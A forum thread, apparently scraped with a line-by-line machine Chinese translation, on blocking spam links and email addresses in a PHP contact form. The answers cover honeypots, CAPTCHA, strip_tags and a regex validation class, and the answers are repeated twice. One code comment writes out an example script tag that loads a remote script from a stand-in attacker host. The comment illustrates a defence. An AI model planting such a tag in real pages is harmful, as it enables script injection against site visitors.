Folks,
I have an html form which sends the form data as an email. Unfortunately spam bots have been filling the form in and send web site links and email addresses in the message part of the form.
我有一个html表单,它将表单数据作为电子邮件发送。不幸的是,垃圾邮件机器人已填写表格并在表格的邮件部分发送网站链接和电子邮件地址。
Is there a way I can delete the web site links and email addresses when the "Submit" button is pressed before it gets sent on as an email address? I use PHP to do the actually sending of the form data as an email message.
有没有办法在按“提交”按钮之前删除网站链接和电子邮件地址,然后才能将其作为电子邮件地址发送?我使用PHP来实际发送表单数据作为电子邮件消息。
Thanks and regards,
感谢致敬,
Tony
8 个解决方案
#1
Have you tried having a hidden form via css (display: none) but in HTML like a regular form, and call it email or something common, and if that form has data, then it must be a bot.
您是否尝试通过css(display:none)使用隐藏表单,但是在HTML中使用常规表单,并将其称为电子邮件或常见内容,如果该表单包含数据,那么它必须是机器人。
#2
How about using regular expressions to replace anything that matches a web link or email address to an empty string.
如何使用正则表达式将任何与Web链接或电子邮件地址匹配的内容替换为空字符串。
You can find tones of regular expression examples on the web, just google it
您可以在网络上找到正则表达式示例的音调,只需谷歌即可
#3
You can do that with Javascript. The problem is that Javascript needs to be enabled for that to happen so you can imagine the odds that the spambots will be cooperative when it comes to this.
你可以用Javascript做到这一点。问题是需要启用Javascript才能实现这一点,这样你就能想象出垃圾邮件在这方面会合作的几率。
You're going to have to filter it out on the server. Personally I would simply reject outright any message containing links or email addresses. Spit back an error to the user but don't even save it.
您将不得不在服务器上过滤掉它。就个人而言,我会直接拒绝任何包含链接或电子邮件地址的邮件。向用户吐回错误,但甚至不保存。
For some tips on detecting spam in PHP read Spam-free accessible forms.
有关在PHP中检测垃圾邮件的一些提示,请阅读无垃圾邮件的可访问表单。
You may also want to consider the use of CAPTCHA.
您可能还想考虑使用CAPTCHA。
#4
Well, if your really want to fight spam, go for these steps:
好吧,如果您真的想打击垃圾邮件,请执行以下步骤:
-
Put a CAPTCHA in the form so that non-humans cannot even submit the form. A very popular CAPTCHA implementation is reCAPTCHA.
在表格中放置一个CAPTCHA,以便非人类甚至无法提交表格。一个非常流行的CAPTCHA实现是reCAPTCHA。
-
Do a strip_tags on the fields so that even if someone puts URLs by hand, it will be removed.
在字段上执行strip_tags,以便即使有人手动放置URL,也会将其删除。
-
Do a regular expression check for email addresses and remove them as well. Pick a good regex expression from the web which will pick most email formats.
对电子邮件地址进行正则表达式检查并删除它们。从网上选择一个好的正则表达式,它将选择大多数电子邮件格式。
Hope this help. Cheers!
希望这有帮助。干杯!
#5
Presumably, you don't want to accept any kind of HTML, just plain text? In this case strip_tags is your friend. strip_tags also allows you to specify some tags that are acceptable.
据推测,您不希望接受任何类型的HTML,只是纯文本?在这种情况下,strip_tags是你的朋友。 strip_tags还允许您指定一些可接受的标记。
I also heartily recommend incorporating a header-injection defence script.
我还衷心建议使用标头注入防御脚本。
#6
Folks,
I tried using strip_tags which certainly removes tags but doesn't remove "mailto:" nor "http://" text, so the links are still links.
我尝试使用strip_tags,它肯定会删除标签,但不会删除“mailto:”或“http://”文本,因此链接仍然是链接。
Is there an easy PHP command or routine that can scan a string and just replace "mailto:" and/or "http://" with a harmless empty string "" in those portions of the string?
是否有一个简单的PHP命令或例程可以扫描字符串,只是在字符串的那些部分用“无害的空字符串”替换“mailto:”和/或“http://”?
Tried googling too but most of the stuff I found was about trimming white space etc.
也尝试使用Google搜索,但我发现的大部分内容都是修剪白色空间等。
Sorry about this, I'm kinda new to PHP.
对此抱歉,我是PHP的新手。
Thanks and Regards,
感谢致敬,
Tony
#7
This is very simplistic, but you could build on it I'm sure ...
这是非常简单的,但你可以建立它,我敢肯定...
Try adding a picture of a cat or dog, then asking them to enter the three letter name of the animal shown ... or something similar. Do a validation check, then go from there ... cheap and easy Captcha. This way only human input is going out .. .
尝试添加猫或狗的图片,然后要求他们输入所示动物的三个字母名称......或类似的东西。做一个验证检查,然后去那里...便宜又简单的验证码。这种方式只有人类输入才会消失。
#8
You would have to iterate over every field in the $_POST array (at least the ones you don't want to have emails or links in) and check it against a couple of regexes.
您将不得不遍历$ _POST数组中的每个字段(至少是您不希望有电子邮件或链接的字段),并针对几个正则表达式进行检查。
The suggestion to use CAPTCHA is also a good one.
使用CAPTCHA的建议也很好。
Anyway, here's a crappy implementation of the checking:
无论如何,这是一个糟糕的检查实现:
class ValidationHelper
{
// Regex taken from https://github.com/google-code-export/prado3/blob/master/framework/Web/UI/WebControls/TEmailAddressValidator.php
const EMAIL_REGEX = "#\\w+([-+.]\\w+)*@\\w+([-.]\\w+)*\\.\\w+([-.]\\w+)*#";
// hacked up regex that I just cooked up - could be hugely improved i'm sure.
const LINK_REGEX = "#(h\s*t\s*t\s*p\s*s?|f\s*t\s*p)\s*:\s*/\s*/#";
public static function containsEmail($value)
{
if (preg_match(self::EMAIL_REGEX, $value))
return true;
return false;
}
public static function containsLink($value)
{
if (preg_match(self::LINK_REGEX, $value))
return true;
return false;
}
}
$errors = array();
foreach ($_POST as $key=>$value) {
// presumably you want at least one email field, yeah?
if ($key != 'email') {
// perhaps you should be running strip_tags over everything if you don't want html and such...
// see http://php.net/strip_tags for more info. without it (or something similar), there's nothing
// to stop people from putting <script type="text/javascript" src="http://notyourdomain.com/~1337skriptkiddy/haxxors.js"></script>
// into your form. even if you might not necessarily ever be displaying this in a scenario
// where it can cause trouble, it's never a bad idea to stop this stuff *before* it gets into your db
$_POST[$key] = $value = strip_tags($value);
if (ValidationHelper::containsEmail($value) || ValidationHelper::containsLink($value))
$errors[] = 'Please ensure the value you entered for '.$fieldNames[$key].' does not contain any links or email addresses';
}
}
if (!empty($errors)) {
// failed - show errors.
}
else {
// success!
}
#1
Have you tried having a hidden form via css (display: none) but in HTML like a regular form, and call it email or something common, and if that form has data, then it must be a bot.
您是否尝试通过css(display:none)使用隐藏表单,但是在HTML中使用常规表单,并将其称为电子邮件或常见内容,如果该表单包含数据,那么它必须是机器人。
#2
How about using regular expressions to replace anything that matches a web link or email address to an empty string.
如何使用正则表达式将任何与Web链接或电子邮件地址匹配的内容替换为空字符串。
You can find tones of regular expression examples on the web, just google it
您可以在网络上找到正则表达式示例的音调,只需谷歌即可
#3
You can do that with Javascript. The problem is that Javascript needs to be enabled for that to happen so you can imagine the odds that the spambots will be cooperative when it comes to this.
你可以用Javascript做到这一点。问题是需要启用Javascript才能实现这一点,这样你就能想象出垃圾邮件在这方面会合作的几率。
You're going to have to filter it out on the server. Personally I would simply reject outright any message containing links or email addresses. Spit back an error to the user but don't even save it.
您将不得不在服务器上过滤掉它。就个人而言,我会直接拒绝任何包含链接或电子邮件地址的邮件。向用户吐回错误,但甚至不保存。
For some tips on detecting spam in PHP read Spam-free accessible forms.
有关在PHP中检测垃圾邮件的一些提示,请阅读无垃圾邮件的可访问表单。
You may also want to consider the use of CAPTCHA.
您可能还想考虑使用CAPTCHA。
#4
Well, if your really want to fight spam, go for these steps:
好吧,如果您真的想打击垃圾邮件,请执行以下步骤:
-
Put a CAPTCHA in the form so that non-humans cannot even submit the form. A very popular CAPTCHA implementation is reCAPTCHA.
在表格中放置一个CAPTCHA,以便非人类甚至无法提交表格。一个非常流行的CAPTCHA实现是reCAPTCHA。
-
Do a strip_tags on the fields so that even if someone puts URLs by hand, it will be removed.
在字段上执行strip_tags,以便即使有人手动放置URL,也会将其删除。
-
Do a regular expression check for email addresses and remove them as well. Pick a good regex expression from the web which will pick most email formats.
对电子邮件地址进行正则表达式检查并删除它们。从网上选择一个好的正则表达式,它将选择大多数电子邮件格式。
Hope this help. Cheers!
希望这有帮助。干杯!
#5
Presumably, you don't want to accept any kind of HTML, just plain text? In this case strip_tags is your friend. strip_tags also allows you to specify some tags that are acceptable.
据推测,您不希望接受任何类型的HTML,只是纯文本?在这种情况下,strip_tags是你的朋友。 strip_tags还允许您指定一些可接受的标记。
I also heartily recommend incorporating a header-injection defence script.
我还衷心建议使用标头注入防御脚本。
#6
Folks,
I tried using strip_tags which certainly removes tags but doesn't remove "mailto:" nor "http://" text, so the links are still links.
我尝试使用strip_tags,它肯定会删除标签,但不会删除“mailto:”或“http://”文本,因此链接仍然是链接。
Is there an easy PHP command or routine that can scan a string and just replace "mailto:" and/or "http://" with a harmless empty string "" in those portions of the string?
是否有一个简单的PHP命令或例程可以扫描字符串,只是在字符串的那些部分用“无害的空字符串”替换“mailto:”和/或“http://”?
Tried googling too but most of the stuff I found was about trimming white space etc.
也尝试使用Google搜索,但我发现的大部分内容都是修剪白色空间等。
Sorry about this, I'm kinda new to PHP.
对此抱歉,我是PHP的新手。
Thanks and Regards,
感谢致敬,
Tony
#7
This is very simplistic, but you could build on it I'm sure ...
这是非常简单的,但你可以建立它,我敢肯定...
Try adding a picture of a cat or dog, then asking them to enter the three letter name of the animal shown ... or something similar. Do a validation check, then go from there ... cheap and easy Captcha. This way only human input is going out .. .
尝试添加猫或狗的图片,然后要求他们输入所示动物的三个字母名称......或类似的东西。做一个验证检查,然后去那里...便宜又简单的验证码。这种方式只有人类输入才会消失。
#8
You would have to iterate over every field in the $_POST array (at least the ones you don't want to have emails or links in) and check it against a couple of regexes.
您将不得不遍历$ _POST数组中的每个字段(至少是您不希望有电子邮件或链接的字段),并针对几个正则表达式进行检查。
The suggestion to use CAPTCHA is also a good one.
使用CAPTCHA的建议也很好。
Anyway, here's a crappy implementation of the checking:
无论如何,这是一个糟糕的检查实现:
class ValidationHelper
{
// Regex taken from https://github.com/google-code-export/prado3/blob/master/framework/Web/UI/WebControls/TEmailAddressValidator.php
const EMAIL_REGEX = "#\\w+([-+.]\\w+)*@\\w+([-.]\\w+)*\\.\\w+([-.]\\w+)*#";
// hacked up regex that I just cooked up - could be hugely improved i'm sure.
const LINK_REGEX = "#(h\s*t\s*t\s*p\s*s?|f\s*t\s*p)\s*:\s*/\s*/#";
public static function containsEmail($value)
{
if (preg_match(self::EMAIL_REGEX, $value))
return true;
return false;
}
public static function containsLink($value)
{
if (preg_match(self::LINK_REGEX, $value))
return true;
return false;
}
}
$errors = array();
foreach ($_POST as $key=>$value) {
// presumably you want at least one email field, yeah?
if ($key != 'email') {
// perhaps you should be running strip_tags over everything if you don't want html and such...
// see http://php.net/strip_tags for more info. without it (or something similar), there's nothing
// to stop people from putting <script type="text/javascript" src="http://notyourdomain.com/~1337skriptkiddy/haxxors.js"></script>
// into your form. even if you might not necessarily ever be displaying this in a scenario
// where it can cause trouble, it's never a bad idea to stop this stuff *before* it gets into your db
$_POST[$key] = $value = strip_tags($value);
if (ValidationHelper::containsEmail($value) || ValidationHelper::containsLink($value))
$errors[] = 'Please ensure the value you entered for '.$fieldNames[$key].' does not contain any links or email addresses';
}
}
if (!empty($errors)) {
// failed - show errors.
}
else {
// success!
}